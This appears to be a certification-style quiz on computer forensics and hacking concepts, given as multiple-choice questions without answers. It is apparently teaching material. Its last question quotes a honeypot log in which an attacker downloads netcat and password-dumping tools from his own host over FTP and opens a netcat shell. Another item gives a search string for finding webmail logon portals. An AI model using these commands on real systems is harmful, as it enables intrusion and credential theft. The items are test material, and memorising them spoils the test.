The newer Macintosh Operating System is based on:

A.

OS/2

B.

BSD Unix

C.

Linux

D.

Microsoft Windows

A suspect is accused of violating the acceptable use of computing resources, as he has
visited adult websites and downloaded images. The investigator wants to demonstrate that
the suspect did indeed visit these sites. However, the suspect has cleared the search
history and emptied the cookie cache. Moreover, he has removed any images he might
have downloaded. What can the investigator do to prove the violation?

A.

Image the disk and try to recover deleted files

B.

Seek the help of co-workers who are eye-witnesses

C.

Check the Windows registry for connection data (you may or may not recover)

D.

Approach the websites for evidence

The following excerpt is taken from a honeypot log. The log captures activities across three
days.
There are several intrusion attempts; however, a few are successful.
(Note: The objective of this question is to test whether the student can read basic
information from log entries and interpret the nature of attack.)
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 ->
172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 ->
172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 ->
172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 ->
172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by
(uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by
simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 ->
213.28.22.189:4558
From the options given below choose the one which best interprets the following entry:
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

A.

An IDS evasion technique

B.

A buffer overflow attempt

C.

A DNS zone transfer

D.

Data being retrieved from 63.226.81.13

You are a security analyst performing reconnaissance on a company you will be carrying
out a penetration test for. You conduct a search for IT jobs on Dice.com and find the
following information for an open position: 7+ years experience in Windows Server
environment 5+ years experience in Exchange 2000/2003 environment Experience with
Cisco Pix Firewall, Linksys 1376 router, Oracle 11i and MYOB v3.4 Accounting software
are required MCSA desired, MCSE, CEH preferred No Unix/Linux Experience needed
What is this information posted on the job website considered?

A.

Social engineering exploit

B.

Competitive exploit

C.

Information vulnerability

D.

Trade secret

Which of the following should a computer forensics lab used for investigations have?

A.

isolation

B.

restricted access

C.

open access

D.

an entry log

Meyer Electronics Systems just recently had a number of laptops stolen out of their office.
On these laptops contained sensitive corporate information regarding patents and company
strategies. A month after the laptops were stolen, a competing company was found to have
just developed products that almost exactly duplicated products that Meyer produces. What
could have prevented this information from being stolen from the laptops?

A.

EFS Encryption

B.

DFS Encryption

C.

IPS Encryption

D.

SDW Encryption

With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________.

A.

0

B.

10

C.

100

D.

1

You are running known exploits against your network to test for possible vulnerabilities. To
test the strength of your virus software, you load a test network to mimic your production
network. Your software successfully blocks some simple macro and encrypted viruses. You
decide to really test the software by using virus code where the code rewrites itself entirely
and the signatures change from child to child, but the functionality stays the same. What
type of virus is this that you are testing?

A.

Polymorphic

B.

Metamorphic

C.

Oligomorhic

D.

Transmorphic

Which of the following refers to the data that might still exist in a cluster even though the original file has been overwritten by another file?

A.

Sector

B.

Metadata

C.

MFT

D.

Slack Space

How many characters long is the fixed-length MD5 algorithm checksum of a critical system file?

A.

128

B.

64

C.

C32

D.

16

You are trying to locate Microsoft Outlook Web Access Default Portal using Google search on the Internet. What search string will you use to locate them?

A.

allinurl:"exchange/logon.asp"

B.

intitle:"exchange server"

C.

locate:"logon page"

D.

outlook:"search"

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort
reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization
vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not
normally have the right to run scripts. The attacker tries a Unicode attack and eventually
succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a
malicious user to construct SQL statements that will execute shell commands (such as
CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists,
and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS
query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?

A.

It is a local exploit where the attacker logs in using username johna2k

B.

There are two attackers on the system - johna2k and haxedj00

C.

The attack is a remote exploit and the hacker downloads three files

D.

The attacker is unsuccessful in spawning a shell as he has specified a high end UDP
port